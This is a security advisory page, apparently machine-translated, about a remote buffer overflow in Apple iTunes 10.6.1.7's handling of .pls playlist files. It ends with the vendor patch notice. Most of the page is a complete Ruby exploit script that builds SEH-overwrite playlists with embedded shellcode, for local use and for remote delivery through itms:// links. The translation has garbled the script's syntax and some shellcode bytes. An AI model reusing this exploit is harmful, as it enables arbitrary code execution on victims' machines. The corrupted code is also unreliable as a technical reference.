Remote buffer overflow vulnerability in Apple iTunes '. pls' file
Remote buffer overflow vulnerability in Apple iTunes '. pls' file
Release date:
Updated on:
Affected Systems:
Apple iTunes 10.6.1.7
Description:
Bugtraq id: 74467
ITunes is a digital media playback app. It is a free app for Mac and PC users to manage and play your digital music and videos.
The remote buffer overflow vulnerability exists in the Process of. pls files in iTunes 10.6.1.7 and other versions. Attackers can exploit this vulnerability to execute arbitrary code in the context of the affected application.
<* Source: Fady Hammed Osman
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
# Exploit Title: Apple Itunes PLS title buffer overflow
# Date: interval l 26,201 5 (Day of disclosing this exploit code)
# Exploit Author: Fady Mohamed Osman (@ fady_osman)
# Vendorhomepage: http://www.apple.com
# Software Link: http://www.apple.com/itunes/download? Id = 890128564
# Version: 10.6.1.7
# Tested on: Windows Xp sp3
# Exploit-db: http://www.exploit-db.com/author? A = 2986
# Youtube: https://www.youtube.com/user/cutehack3r
Header = "[Playlist] \ r \ n"
Header <"NumberOfEntries = 1 \ r \ n"
Header <"File1 = http://www.example.com/web/faq/multimedia/sample.mp3?r=n"
Header <"Title1 ="
Nseh_longer = "\ xeb \ x1E \ x90 \ x90"
Nseh_shorter = "\ xeb \ x06 \ x90 \ x90"
Seh = 0x72d119de # pop ret from msacm32.drv
Shell = "\ xdd \ xc1 \ xd9 \ x74 \ x24 \ xf4 \ xbb \ x2b \ x2b \ x88 \ x37 \ x5a \ x31 \ xc9" +
"\ Xb1 \ x33 \ x83 \ xea \ xfc \ x31 \ x5a \ x13 \ x03 \ x71 \ x38 \ x6a \ xc2 \ x79" +
"\ Xd6 \ xe3 \ x2d \ x81 \ x27 \ x94 \ xa4 \ x64 \ x16 \ x86 \ xd3 \ xed \ x0b \ x16" +
"\ X97 \ xa3 \ xa7 \ xdd \ xf5 \ x57 \ x33 \ x93 \ xd1 \ x58 \ xf4 \ x1e \ x04 \ x57" +
"\ X05 \ xaf \ x88 \ x3b \ xc5 \ xb1 \ x74 \ x41 \ x1a \ x12 \ x44 \ x8a \ x6f \ x53" +
"\ X81 \ xf6 \ x80 \ x01 \ x5a \ x7d \ x32 \ xb6 \ xef \ xc3 \ x8f \ xb7 \ x3f \ x48" +
"\ Xaf \ xcf \ x3a \ x8e \ x44 \ x7a \ x44 \ xde \ xf5 \ xf1 \ x0e \ xc6 \ x7e \ x5d" +
"\ Xaf \ xf7 \ x53 \ xbd \ x93 \ xbe \ xd8 \ x76 \ x67 \ x41 \ x09 \ x47 \ x88 \ cross" +
"\ X75 \ x04 \ xb7 \ xbd \ x78 \ x54 \ xff \ x79 \ x63 \ x23 \ x0b \ x7a \ x1e \ x34" +
"\ Xc8 \ x01 \ xc4 \ xb1 \ xcd \ xa1 \ x8f \ x62 \ x36 \ x50 \ x43 \ xf4 \ xbd \ x5e" +
"\ X28 \ x72 \ x99 \ x42 \ xaf \ x57 \ x91 \ x7e \ x24 \ x56 \ x76 \ xf7 \ x7e \ x7d" +
"\ X52 \ x5c \ x24 \ x1c \ xc3 \ x38 \ x8b \ x21 \ x13 \ xe4 \ x74 \ x84 \ x5f \ x06" +
"\ X60 \ xbe \ x3d \ x4c \ x77 \ x32 \ x38 \ x29 \ x77 \ x4c \ x43 \ x19 \ x10 \ x7d" +
"\ Xc8 \ xf6 \ x67 \ x82 \ x1b \ xb3 \ x98 \ xc8 \ x06 \ x95 \ x30 \ x95 \ xd2 \ xa4" +
"\ X5c \ x26 \ x09 \ xea \ x58 \ xa5 \ xb8 \ x92 \ x9e \ xb5 \ xc8 \ x97 \ xdb \ x71" +
"\ X20 \ xe5 \ x74 \ x14 \ x46 \ x5a \ x74 \ x3d \ x25 \ x3d \ xe6 \ xdd \ x84 \ xd8" +
"\ X8e \ x44 \ xd9"
#1020 --> offset in local exploits
Payload = header + "A" * 1020 + nseh_shorter + [seh]. pack ('V') + shell
#380 or 404 (if itunes wasn' t already loaded) --> offset in remote ones using the itms protocol.
Payload_remote = header + "A" * 380 + nseh_longer + [seh]. pack ('V') + "A" * 16 + nseh_shorter + [seh]. pack ('V') + shell
# When using as local exploit
Open ('ploit. pls ', 'w') {| f |
F. puts payload
}
Puts ('local file created ')
# Place this in a web server and use the itms: // protocol to load it.
Open ('ploit _ remote. pls ', 'w') {| f |
F. puts payload_remote
}
Puts ('remote file created ')
Suggestion:
Vendor patch:
Apple
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.apple.com/support/downloads/
This article permanently updates the link address: